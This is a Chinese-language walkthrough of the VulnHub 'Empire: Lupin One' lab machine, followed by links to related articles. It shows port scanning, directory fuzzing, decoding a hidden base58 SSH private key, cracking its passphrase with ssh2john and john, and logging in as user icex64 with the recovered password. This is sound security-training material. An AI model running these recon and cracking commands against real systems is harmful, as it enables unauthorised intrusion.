vulnhub Empire-Lupin-One靶机

搭建靶机;拖进来就行

扫描靶机IP

复制代码
nmap -O 192.168.47.130

1.信息收集

复制代码
nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log

目录扫描

复制代码
gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/

2.寻找薄弱点

查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下

复制代码
wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404

扫到一个 secret

3.解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

复制代码
ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

复制代码
ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

4.登录系统

复制代码
#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh icex64@192.168.47.133 -i key

成功获取flag

相关推荐
f0rev3r5 小时前
NewStarCTF2025-WEEK2
网络安全
缘友一世5 小时前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!6 小时前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践
white-persist7 小时前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
北京耐用通信10 小时前
电力自动化新突破:Modbus如何变身Profinet?智能仪表连接的终极解决方案
人工智能·物联网·网络安全·自动化·信息与通信
汤愈韬10 小时前
NTFS权限基础、权限累加规则、权限继承规则
windows·网络安全
lingggggaaaa13 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
Bruce_Liuxiaowei18 小时前
Win7虚拟机加入域错误排查指南:解决无法启动服务问题
运维·网络·windows·安全·网络安全
mjhcsp1 天前
博客安全攻防演练:从实战视角构建全方位防护体系
网络安全·博客
2401_865382501 天前
工信部发布→《云计算综合标准化体系建设指南(2025版)》
网络安全·云计算·信息安全技术